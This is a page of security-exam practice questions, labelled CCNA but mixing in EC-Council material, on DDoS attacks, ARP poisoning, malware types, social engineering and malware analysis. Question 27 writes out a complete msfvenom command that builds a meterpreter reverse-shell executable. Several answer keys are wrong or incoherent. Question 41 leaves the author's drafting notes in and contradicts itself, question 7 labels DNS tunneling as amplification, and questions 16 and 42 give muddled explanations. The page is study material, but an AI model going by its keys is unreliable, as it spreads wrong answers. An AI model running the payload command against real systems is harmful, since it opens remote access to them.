CCNA Malware, Social Engineering and Network Attacks Questions

75 of 216 questions · Page 1/3 · Malware, Social Engineering and Network Attacks · Answers revealed

1
MCQmedium

Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?

A.Amplification attack
B.HTTP flood
C.SYN flood
D.ICMP flood
AnswerA

Amplification uses reflectors to multiply traffic.

Why this answer

Amplification attacks (e.g., DNS, NTP, SNMP) send small queries with spoofed source IP to servers that reply with large responses to the victim.

2
MCQmedium

A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?

A.Ettercap
B.Nmap
C.tcpdump
D.Wireshark
AnswerA

Ettercap is specifically designed for ARP poisoning and MITM attacks.

Why this answer

Ettercap is a comprehensive MITM tool that performs ARP poisoning. The symptom of incorrect ARP entries for the gateway is classic ARP cache poisoning.

3
Multi-Selectmedium

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

Select 2 answers
A.UDP flood
B.HTTP flood
C.Slowloris
D.ICMP flood
E.SYN flood
AnswersB, C

Correct. HTTP flood sends many HTTP requests at the application layer.

Why this answer

Slowloris holds connections open, and HTTP floods send many HTTP requests. SYN flood and ICMP flood are network-layer attacks.

4
MCQhard

A SOC analyst observes a high number of incomplete TCP connections with the SYN flag set but no corresponding ACK from the target. The source IPs are spoofed and the connections are targeting port 80 on a web server. Which DDoS mitigation technique would be MOST effective in this scenario?

A.SYN cookies
B.Rate limiting
C.Anycast distribution
D.Ingress filtering
AnswerA

SYN cookies encode connection state in the SYN-ACK, allowing the server to avoid resource allocation until the handshake completes.

Why this answer

SYN flood attacks exploit the TCP three-way handshake by sending many SYN packets without completing the handshake. SYN cookies allow the server to avoid storing half-open connections, effectively mitigating SYN floods.

5
Multi-Selectmedium

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

Select 2 answers
A.It spreads without user interaction.
B.It attaches to a host file and does not change.
C.It changes its code signature on each infection.
D.It uses encryption to hide its payload.
E.It only infects the boot sector.
AnswersC, D

Correct. Polymorphic viruses mutate their code.

Why this answer

Polymorphic viruses change their code signature each time they replicate, making detection difficult. They often use encryption to hide malicious code.

6
Multi-Selecthard

Which THREE of the following are techniques used in session hijacking?

Select 3 answers
A.DNS cache poisoning
B.Man-in-the-middle (MITM) interception
C.MAC flooding
D.Cookie theft and replay
E.TCP sequence number prediction
AnswersB, D, E

MITM attacks allow the attacker to intercept and manipulate session data.

Why this answer

Man-in-the-middle (MITM) interception is a core session hijacking technique where the attacker positions themselves between the client and server to intercept and manipulate traffic. By capturing session tokens or credentials in transit, the attacker can impersonate the legitimate user without needing to predict sequence numbers or steal cookies directly.

Exam trap

EC-Council often tests the distinction between attacks that enable session hijacking (like MITM) versus attacks that are merely precursors or different categories (like DNS poisoning or MAC flooding), so candidates mistakenly select options that facilitate but do not directly perform session hijacking.

7
MCQhard

An IDS alerts on a large number of outbound DNS queries from an internal host to a suspicious domain. The queries have random subdomains and the response size is large. Which attack is MOST likely in progress?

A.Slowloris attack
B.UDP flood
C.DNS amplification attack
D.DNS tunneling
AnswerC

Correct. The large responses and random subdomains indicate an amplification attack.

Why this answer

A DNS amplification attack uses open DNS resolvers to send large responses to a spoofed victim IP. The random subdomains are used to generate large responses, and the outbound queries are from the internal host acting as reflector.

8
Multi-Selectmedium

Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)

Select 2 answers
A.Port knocking
B.ARP poisoning
C.Rate limiting
D.Scrubbing centers
E.MAC filtering
AnswersC, D

Rate limiting restricts the number of requests from a source, mitigating DDoS.

Why this answer

Rate limiting limits traffic per source, and scrubbing centers filter malicious traffic. Anycast distributes traffic, and blackholing drops traffic, but rate limiting and scrubbing are direct mitigations.

9
MCQeasy

Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?

A.Ettercap
B.macof
C.Nmap
D.Wireshark
AnswerB

macof is specifically designed for MAC flooding.

Why this answer

macof (part of the dsniff suite) floods a switch with many fake MAC addresses, exhausting the CAM table and causing the switch to flood traffic out all ports.

10
MCQeasy

A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?

A.Spyware exfiltrating data
B.A keylogger capturing keystrokes
C.A worm spreading across the network
D.Ransomware encrypting files
AnswerC

Worms often generate network traffic, including DNS queries, as they attempt to find and infect new hosts.

Why this answer

A worm self-replicates across the network, often generating unusual DNS queries as it spreads.

11
MCQeasy

A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?

A.Whaling
B.Baiting
C.Vishing
D.Spear phishing
AnswerA

Whaling is a form of spear phishing that targets senior executives, often with urgent requests.

Why this answer

Whaling targets high-level executives (like the CEO) with personalized phishing emails. The urgency and impersonation of a CEO are classic whaling indicators.

12
MCQhard

A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?

A.UDP flood
B.SYN flood
C.Smurf attack
D.Ping of Death
AnswerC

Smurf uses ICMP echo requests to broadcast address with spoofed source, causing amplification.

Why this answer

A Smurf attack sends ICMP echo requests to the network broadcast address with the victim's spoofed source IP, causing all hosts to reply to the victim, amplifying traffic.

13
MCQeasy

Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?

A.Nmap
B.Ettercap
C.Wireshark
D.Metasploit
AnswerB

Ettercap supports ARP poisoning, DNS spoofing, and other MITM techniques.

Why this answer

Ettercap is a well-known suite for ARP poisoning, enabling MITM attacks. It can intercept traffic between hosts on a switched network.

14
MCQmedium

A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?

A.HTTP flood
B.Slowloris attack
C.SYN flood
D.UDP flood
AnswerB

Slowloris partially sends HTTP headers and keeps connections open.

Why this answer

Slowloris is a low-bandwidth application-layer DoS attack that keeps many connections open by sending partial HTTP requests, exhausting server resources.

15
MCQeasy

Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?

A.Trojan
B.Ransomware
C.Worm
D.Virus
AnswerC

Worms self-replicate without host files.

Why this answer

Worms are standalone malware that self-replicate and spread over networks.

16
MCQmedium

During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?

A.Ransomware
B.Backdoor
C.Keylogger
D.Downloader
AnswerB

Correct. A backdoor Trojan provides unauthorized remote access to the system.

Why this answer

A Remote Access Trojan (RAT) provides the attacker with remote control over the victim machine, often with features for persistence and stealth.

17
MCQmedium

A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?

A.Ping of Death
B.HTTP flood
C.SYN flood
D.Slowloris
AnswerD

Slowloris sends slow partial HTTP headers to keep connections open.

Why this answer

Slowloris is an application-layer DDoS attack that holds connections open by sending partial HTTP requests, exhausting server connection pools. It uses many sources and slow sending.

18
Multi-Selectmedium

Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)

Select 2 answers
A.It does not require a host file to spread
B.It changes its code signature each time it replicates
C.It uses a mutation engine to generate new decryption routines
D.It only infects the master boot record
E.It attaches to email messages automatically
AnswersB, C

Polymorphic viruses mutate to avoid detection.

Why this answer

Polymorphic viruses change their code signature each time they replicate, using mutation engines to evade signature detection.

19
MCQeasy

Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?

A.Wireshark
B.Nmap
C.Metasploit
D.SET
AnswerD

SET is the Social Engineering Toolkit, designed for automating social engineering attacks.

Why this answer

The Social Engineering Toolkit (SET) is a well-known framework for automating social engineering attacks.

20
MCQmedium

A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?

A.Ping of Death
B.Smurf attack
C.UDP flood
D.SYN flood
AnswerD

Correct. A SYN flood sends many SYN packets with no final ACK, overwhelming the target.

Why this answer

A SYN flood sends many SYN packets without completing the handshake, exhausting target resources. The attacker's server is the source, indicating it is being used to launch the attack.

21
MCQmedium

After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?

A.DLL hijacking
B.Privilege escalation
C.Process injection
D.Buffer overflow
AnswerC

CreateRemoteThread and WriteProcessMemory are used to inject code into a remote process.

Why this answer

These Windows API functions are commonly used for process injection, where code is written into another process's memory and executed. This is a common malware technique to evade detection.

22
Multi-Selectmedium

Which TWO of the following are examples of application layer DDoS attacks? (Select two.)

Select 2 answers
A.Slowloris
B.UDP flood
C.Smurf attack
D.HTTP flood
E.SYN flood
AnswersA, D

Correct. Slowloris keeps many connections open to exhaust server resources.

Why this answer

Slowloris and HTTP flood are application layer attacks that target web servers by exhausting connections or sending high volumes of HTTP requests.

23
Multi-Selecthard

Which THREE of the following are techniques used in session hijacking? (Select three.)

Select 3 answers
A.ARP poisoning
B.DNS amplification
C.TCP sequence prediction
D.Cookie theft
E.MAC flooding
AnswersA, C, D

Correct. ARP poisoning enables MITM, which can be used to hijack sessions.

Why this answer

TCP sequence prediction allows an attacker to guess sequence numbers and inject packets. Cookie theft (e.g., via XSS) steals session tokens. ARP poisoning enables MITM to intercept and hijack sessions.

24
MCQeasy

Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?

A.Nmap
B.Wireshark
C.Metasploit
D.Ettercap
AnswerD

Ettercap supports ARP poisoning, DNS spoofing, and other MITM techniques.

Why this answer

Ettercap is a comprehensive suite for man-in-the-middle attacks on LAN, featuring ARP poisoning capabilities. Wireshark is a packet analyzer, Nmap is a network scanner, and Metasploit is an exploitation framework.

25
MCQeasy

Which of the following is a characteristic of a polymorphic virus?

A.It changes its code pattern with each infection to evade detection
B.It remains dormant until a specific date
C.It spreads without user interaction
D.It attaches to the boot sector of a hard drive
AnswerA

Correct. Polymorphic viruses mutate their code to avoid signature-based detection.

Why this answer

Polymorphic viruses change their code signature each time they replicate, making signature-based detection difficult.

26
Multi-Selectmedium

Which TWO of the following are examples of application-layer DDoS attacks?

Select 2 answers
A.ICMP flood
B.Slowloris
C.SYN flood
D.HTTP flood
E.UDP flood
AnswersB, D

Slowloris keeps many connections open by sending partial HTTP requests.

Why this answer

Slowloris and HTTP flood are application-layer attacks targeting the web server's ability to handle requests. SYN flood and UDP flood are lower-layer attacks (transport and network).

27
MCQhard

A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?

A.Generating a Trojan
B.Creating a virus
C.Deploying a worm
D.Initiating a DoS attack
AnswerA

The payload is a backdoor that allows remote control, characteristic of a Trojan.

Why this answer

Msfvenom generates a payload. The payload 'windows/meterpreter/reverse_tcp' creates a reverse shell that connects back to the attacker's IP and port. This is a classic Trojan/backdoor, specifically a remote access Trojan (RAT).

28
MCQmedium

During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?

A.Session hijacking
B.MAC flooding
C.DNS spoofing
D.ARP poisoning
AnswerD

ARP poisoning sends unsolicited ARP replies to map an IP to a different MAC, enabling MITM.

Why this answer

ARP poisoning (also known as ARP spoofing) involves sending forged ARP replies to associate an IP with a different MAC, enabling MITM attacks. The other options do not fit the ARP reply pattern.

29
Multi-Selectmedium

A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?

Select 2 answers
A.Smurf attack
B.Volumetric attack
C.Application-layer (Layer 7) attack
D.SYN flood attack
E.Distributed denial-of-service (DDoS) attack
AnswersC, E

HTTP GET requests targeting a specific page are application-layer.

Why this answer

HTTP flood is an application-layer DDoS sending many seemingly legitimate requests. Distributed means many sources. Volumetric floods use high bandwidth, and SYN flood uses TCP handshake.

30
MCQmedium

A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?

A.Smurf attack
B.Ping of Death
C.SYN flood
D.Slowloris
AnswerA

ICMP to broadcast addresses with spoofed source IP.

Why this answer

A Smurf attack uses ICMP echo requests to a broadcast address, causing all hosts to reply and flood the victim.

31
Multi-Selecteasy

Which TWO of the following are types of malware that specifically aim to demand payment from victims?

Select 2 answers
A.Keylogger
B.Spyware
C.Scareware
D.Ransomware
E.Adware
AnswersC, D

Scareware displays fake alerts to trick users into paying for removal.

Why this answer

Ransomware encrypts files and demands ransom; scareware tricks users into paying for fake threats.

32
MCQeasy

Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?

A.Trojan
B.Ransomware
C.Worm
D.Virus
AnswerC

Worms self-propagate across networks independently.

Why this answer

Worms are standalone malware that self-replicate and spread across networks. Viruses require a host file, Trojans disguise as legitimate software, and ransomware focuses on encryption.

33
MCQeasy

Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?

A.Strings
B.PEiD
C.VirusTotal
D.Cuckoo Sandbox
AnswerD

Cuckoo Sandbox is a dynamic analysis tool that executes malware in a sandbox and monitors behavior.

Why this answer

Cuckoo Sandbox is a popular open-source automated malware analysis system that runs samples in an isolated environment and reports behavior.

34
MCQeasy

Which type of malware encrypts the victim's files and demands payment for the decryption key?

A.Keylogger
B.Spyware
C.Adware
D.Ransomware
AnswerD

Correct. Ransomware encrypts files and demands ransom.

Why this answer

Ransomware is designed to encrypt files and demand ransom for the decryption key.

35
MCQmedium

During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?

A.Polymorphic virus
B.Ransomware
C.Trojan
D.Worm
AnswerC

The process masquerades as a legitimate service (svchost.exe) to avoid detection, typical of a Trojan or backdoor.

Why this answer

The name 'svch0st.exe' mimics 'svchost.exe', a legitimate Windows process. Such masquerading is common with Trojans and backdoors. The absence of a digital signature and high CPU usage suggests malicious activity.

A Trojan or backdoor is most likely.

36
MCQmedium

A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?

A.The network is using a switch instead of a hub
B.The switch is preventing sniffing due to port security
C.The analyst is not using the correct filter in Wireshark
D.The network interface is not in promiscuous mode
AnswerA

Switches send frames only to the specific port, making sniffing difficult without additional techniques.

Why this answer

A switch only forwards traffic to the port where the destination MAC resides; promiscuous mode only affects the local NIC, not switch behavior.

37
Multi-Selectmedium

Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)

Select 2 answers
A.Smurf attack
B.SYN flood
C.HTTP flood
D.Slowloris
E.UDP flood
AnswersA, B

Smurf attack uses ICMP echo requests with spoofed source IP.

Why this answer

SYN flood and Smurf attack exploit TCP/IP protocol weaknesses.

38
MCQmedium

An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?

A.Vishing
B.Phishing
C.Baiting
D.SMiShing
AnswerD

SMiShing is phishing via SMS.

Why this answer

SMiShing (SMS phishing) is a phishing attack conducted via SMS text messages. The message uses urgency to trick the recipient into revealing credentials.

39
MCQeasy

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

A.Ransomware
B.Trojan
C.Spyware
D.Adware
AnswerA

Ransomware encrypts files and demands payment for decryption.

Why this answer

Ransomware is specifically designed to encrypt files and demand ransom. The other options do not typically encrypt files for ransom.

40
MCQeasy

Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?

A.Metasploit
B.Nmap
C.Wireshark
D.SET
AnswerD

SET is the Social Engineering Toolkit.

Why this answer

The Social Engineering Toolkit (SET) is a framework for social engineering attacks, including phishing.

41
MCQeasy

An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?

A.Spear phishing
B.Whaling
C.Baiting
D.Phishing
AnswerB

Whaling targets high-profile executives like the CFO, often with CEO impersonation.

Why this answer

Whaling targets high-profile individuals like executives. Spear phishing targets specific individuals, but whaling is specifically aimed at whales (big fish). The email from the CEO targeting an employee would be spear phishing, but the term 'whaling' is used when the target is a high-level executive.

However, the email is from the CEO, so the attacker is impersonating a whale. Actually, whaling is when the target is a whale. Here the target is not necessarily a whale.

The best answer is 'Spear phishing' because it's targeted. But the question says 'appears to come from the CEO' – that's impersonation. 'Pretexting' involves fabricating a scenario. 'Phishing' is generic. 'Spear phishing' is targeted. I'll go with 'Spear phishing' as the most accurate.

I'll correct scenario: An attacker sends an email to a CFO appearing to be from the CEO. That's whaling. Let me adjust the stem to make it clear: 'An attacker sends an email to the company CFO that appears to come from the CEO, requesting an urgent wire transfer.

Which type of social engineering attack is this?' Then the answer is 'Whaling'.

42
MCQhard

A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?

A.Adware
B.Worm
C.Trojan backdoor
D.Ransomware
AnswerC

A backdoor Trojan may use LDAP for covert communication.

Why this answer

Port 389 is used by LDAP. Outbound traffic to multiple external IPs could indicate LDAP query-based command and control or data exfiltration, but more commonly, port 389 is associated with directory services. However, in malware context, it could be a sign of a backdoor or RAT using LDAP for C2.

The most likely is that the malware is using LDAP for communication, but given options, a Trojan backdoor is plausible.

43
Multi-Selectmedium

Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)

Select 2 answers
A.Ransomware
B.Macro virus
C.Polymorphic virus
D.Worm
E.Trojan horse
AnswersA, E

Often delivered via phishing links or attachments requiring user interaction.

Why this answer

Trojans typically require user interaction to execute, and ransomware often requires user action (clicking a link or opening an attachment) to trigger. Worms and polymorphic viruses can spread without user interaction, though viruses generally need a host file.

44
Multi-Selecthard

Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)

Select 3 answers
A.Unexpected network traffic on ports typically used for remote administration
B.Persistent high CPU usage by a single process
C.Unauthorized processes running in the background
D.Increased number of DNS queries to known legitimate sites
E.Unusual outbound connections to unknown IP addresses
AnswersA, C, E

Backdoors often use ports like 4444, 1337 for communication.

Why this answer

Backdoor Trojans often cause unusual network connections to unknown IPs, unexpected outbound traffic, and unauthorized processes running. High CPU usage alone could be other malware, but combined with network activity it's indicative.

45
Multi-Selecthard

Which THREE of the following are techniques used in static malware analysis? (Select 3)

Select 3 answers
A.Inspecting file metadata and properties
B.Capturing network traffic in a sandbox
C.Searching for suspicious strings in the binary
D.Analyzing the file's structure using PEiD
E.Monitoring registry changes during execution
AnswersA, C, D

This is static analysis.

Why this answer

Static analysis examines the binary without execution. Inspecting file metadata, searching for suspicious strings, and analyzing the file's structure (e.g., using PEiD) are static techniques. Monitoring registry changes and network connections require execution (dynamic analysis).

46
Multi-Selecthard

Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)

Select 3 answers
A.MAC address filtering
B.Scrubbing centers
C.Anycast routing
D.Rate limiting
E.Disabling DHCP
AnswersB, C, D

Dedicated infrastructure filters out attack traffic.

Why this answer

Rate limiting restricts traffic per source, scrubbing centers filter malicious traffic, and anycast disperses traffic across multiple nodes to absorb attacks.

47
MCQmedium

A security analyst observes a sudden flood of ICMP echo request packets from multiple external IPs to a single internal server. The packets have varying sizes and spoofed source addresses. Which type of attack is MOST likely occurring?

A.Ping of Death
B.ICMP flood
C.Smurf attack
D.SYN flood
AnswerB

Multiple sources sending ICMP echo requests with spoofed IPs is a classic ICMP flood, a volumetric DoS.

Why this answer

A distributed ICMP flood (ping flood) uses multiple sources to overwhelm a target with ICMP echo requests. Spoofed source addresses and varying packet sizes are common characteristics.

48
MCQmedium

A security team detects a large number of UDP packets from multiple sources directed at a single server's DNS port (53). The packets appear to have a spoofed source IP of the target. Which type of DDoS attack is being observed?

A.DNS amplification
B.UDP flood
C.SYN flood
D.ICMP flood
AnswerA

Attackers send small queries with spoofed source IP to open DNS resolvers, which reply with large responses to the victim.

Why this answer

A DNS amplification attack uses open DNS resolvers to send large responses to a spoofed victim IP, amplifying traffic. The characteristics include UDP, port 53, spoofed source, and many sources (amplifiers).

49
MCQmedium

Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?

A.Ettercap
B.tcpdump
C.Wireshark
D.Nmap
AnswerC

Wireshark captures and analyzes packets.

Why this answer

Wireshark is the standard tool for capturing and analyzing network packets in pcap format.

50
MCQeasy

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

A.Spyware
B.Adware
C.Keylogger
D.Ransomware
AnswerD

Ransomware encrypts files and demands ransom.

Why this answer

Ransomware encrypts files and demands ransom, typically in cryptocurrency.

51
Multi-Selectmedium

Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)

Select 2 answers
A.TCP sequence prediction
B.MAC flooding
C.Cookie theft
D.DNS spoofing
E.ARP poisoning
AnswersA, C

Attackers can predict sequence numbers to hijack a TCP session.

Why this answer

TCP sequence prediction is a core technique in session hijacking where an attacker predicts or sniffs the TCP sequence numbers used by the client and server to inject forged packets and take over an established TCP session. By correctly guessing the next sequence number, the attacker can spoof the client's IP address and send malicious commands that the server accepts as legitimate traffic.

Exam trap

The trap here is confusing network-level attacks like ARP poisoning or DNS spoofing with session hijacking, which specifically requires taking over an authenticated session by manipulating TCP sequence numbers or stealing session tokens.

52
Multi-Selecthard

Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)

Select 3 answers
A.Spoofs the source IP address of the victim
B.Amplifies traffic by sending small queries that generate large responses
C.Uses open DNS resolvers
D.Exploits the TCP handshake process
E.Floods the target with small ICMP packets
AnswersA, B, C

Queries are sent with the victim's IP as source so responses go to victim.

Why this answer

DNS amplification uses open DNS resolvers, spoofs the victim's IP, and exploits small queries to generate large responses, thereby amplifying traffic.

53
MCQeasy

Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?

A.Boot sector virus
B.Polymorphic virus
C.Macro virus
D.Worm
AnswerB

Polymorphic viruses change their code to evade signature detection.

Why this answer

Polymorphic viruses change their code signature (using mutation engines) each replication to avoid detection.

54
Multi-Selectmedium

Which TWO of the following are examples of amplification attacks used in DDoS?

Select 2 answers
A.DNS amplification
B.NTP amplification
C.Slowloris
D.SYN flood
E.Ping of Death
AnswersA, B

DNS amplification uses small queries to generate large responses.

Why this answer

Amplification attacks exploit protocols that respond with larger payloads than the request, magnifying traffic. NTP and DNS are common examples.

55
MCQeasy

Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?

A.Worm
B.Trojan horse
C.Virus
D.Ransomware
AnswerA

Worms are self-replicating and spread automatically.

Why this answer

Worms are standalone self-replicating malware that spread across networks without needing to attach to host files.

56
MCQhard

An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?

A.UDP flood
B.SYN flood
C.Slowloris
D.HTTP flood
AnswerC

Slowloris sends incomplete HTTP requests to keep connections open, exhausting connection pool.

Why this answer

Slowloris sends partial HTTP requests to keep connections open, exhausting the server's connection pool.

57
MCQmedium

An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?

A.Anycast
B.Scrubbing center
C.Rate limiting
D.Load balancing
AnswerA

Anycast distributes traffic across multiple nodes based on routing protocols.

Why this answer

Anycast routing allows traffic to be directed to the nearest or best-performing server among multiple locations, helping absorb DDoS traffic.

58
MCQmedium

An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?

A.Use IPsec
B.Implement DNSSEC
C.Use a firewall
D.Disable DNS recursion
AnswerB

DNSSEC validates DNS responses.

Why this answer

DNSSEC adds cryptographic signatures to DNS data, preventing spoofed responses.

59
Multi-Selecthard

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

Select 3 answers
A.Disabling TCP SYN cookies
B.Anycast network distribution
C.Scrubbing centers
D.Rate limiting
E.Using a single server with high bandwidth
AnswersB, C, D

Why this answer

Rate limiting restricts traffic volume, scrubbing centers filter malicious traffic, and anycast distributes traffic across multiple servers.

60
MCQmedium

A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?

A.Anycast network
B.Rate limiting
C.Load balancer
D.Scrubbing center
AnswerA

Anycast distributes traffic to multiple locations, mitigating volumetric attacks.

Why this answer

Anycast routing allows multiple servers to share the same IP address; traffic flows to the nearest server, distributing the load and absorbing DDoS attacks.

61
MCQhard

An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?

A.Pretexting
B.Tailgating
C.Baiting
D.Quid pro quo
AnswerB

Tailgating is physically following someone through a secure entrance.

Why this answer

Tailgating is when an unauthorized person follows an authorized individual into a restricted area without consent. It is a physical security breach.

62
MCQeasy

Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?

A.Spyware
B.Adware
C.Keylogger
D.Ransomware
AnswerD

Ransomware encrypts files and demands ransom.

Why this answer

Ransomware encrypts files and demands payment for decryption. Examples include CryptoLocker, WannaCry, and Locky.

63
MCQhard

A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?

A.Smurf attack
B.SYN flood
C.Ping of Death
D.ICMP flood
AnswerA

Correct. Smurf uses broadcast amplification and spoofed source IP to flood the victim.

Why this answer

A Smurf attack sends ICMP echo requests to a broadcast address with the victim's spoofed source IP, causing all hosts on the subnet to reply to the victim, overwhelming it.

64
MCQmedium

An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?

A.Phishing
B.Vishing
C.Whaling
D.Spear phishing
AnswerC

Whaling targets senior executives with personalized attacks.

Why this answer

Whaling is a spear-phishing attack targeting senior executives, often with requests for wire transfers or sensitive information.

65
MCQmedium

A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?

A.ARP poisoning
B.Session hijacking
C.DNS spoofing
D.MAC flooding
AnswerA

ARP poisoning causes multiple MAC entries for one IP due to forged ARP replies.

Why this answer

Multiple MAC addresses for one IP in the ARP cache is a sign of ARP spoofing/poisoning, where an attacker sends forged ARP replies to associate their MAC with the victim's IP.

66
MCQmedium

A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?

A.Upload to VirusTotal
B.Dynamic analysis in a sandbox
C.Static analysis using strings and PEiD
D.Run the file on a production system to observe behavior
AnswerC

Correct. Static analysis can reveal suspicious strings, packed executables, or invalid signatures without execution.

Why this answer

Static analysis (e.g., examining strings, digital signatures, PE headers) is the first step because it is safe and can quickly identify suspicious indicators without executing the file.

67
Multi-Selecteasy

Which TWO of the following are types of malware analysis? (Select two.)

Select 2 answers
A.Static analysis
B.Memory analysis
C.Signature analysis
D.Dynamic analysis
E.Heuristic analysis
AnswersA, D

Correct. Static analysis reviews code and structure without execution.

Why this answer

Static analysis examines the file without executing it (e.g., examining strings, headers). Dynamic analysis executes the malware in a controlled environment (sandbox) to observe behavior.

68
MCQmedium

An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?

A.Rate limiting on all ports
B.Deploying a scrubbing center
C.Blocking all UDP traffic
D.Implementing SYN cookies
AnswerB

Scrubbing centers can analyze and filter out malicious UDP traffic while allowing legitimate traffic.

Why this answer

Scrubbing centers filter malicious traffic from legitimate traffic, effectively mitigating volumetric DDoS attacks.

69
MCQhard

During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?

A.DNS spoofing
B.MAC flooding
C.Session hijacking
D.ARP poisoning
AnswerB

MAC flooding fills the switch's MAC address table, causing it to broadcast frames.

Why this answer

MAC flooding attacks send many fake MAC addresses to overflow the switch's MAC table, forcing it into hub mode and allowing traffic sniffing.

70
Multi-Selectmedium

Which TWO tools are commonly used for ARP poisoning attacks?

Select 2 answers
A.Wireshark
B.Cain & Abel
C.tcpdump
D.Ettercap
E.Nmap
AnswersB, D

Cain & Abel is a Windows tool that includes ARP poisoning capabilities.

Why this answer

Ettercap and Cain & Abel are well-known tools for ARP poisoning, allowing attackers to intercept traffic on a LAN.

71
Multi-Selecthard

Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)

Select 3 answers
A.Multiple MAC addresses associated with the same IP in the ARP cache
B.Duplicate IP addresses in the ARP table
C.A sudden spike in DNS traffic
D.Unusual ARP replies without corresponding requests
E.Increased network latency on the victim's connection
AnswersB, D, E

ARP spoofing assigns the same IP to multiple MAC addresses, causing duplicates.

Why this answer

ARP spoofing often causes duplicate IP addresses in ARP tables, unusual ARP traffic, and increased latency due to packet interception. A sudden spike in DNS traffic is not directly related to ARP spoofing.

72
MCQmedium

A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?

A.Spear phishing
B.Whaling
C.Phishing
D.Vishing
AnswerA

Targeted emails with personalized context and spoofed domain indicate spear phishing.

Why this answer

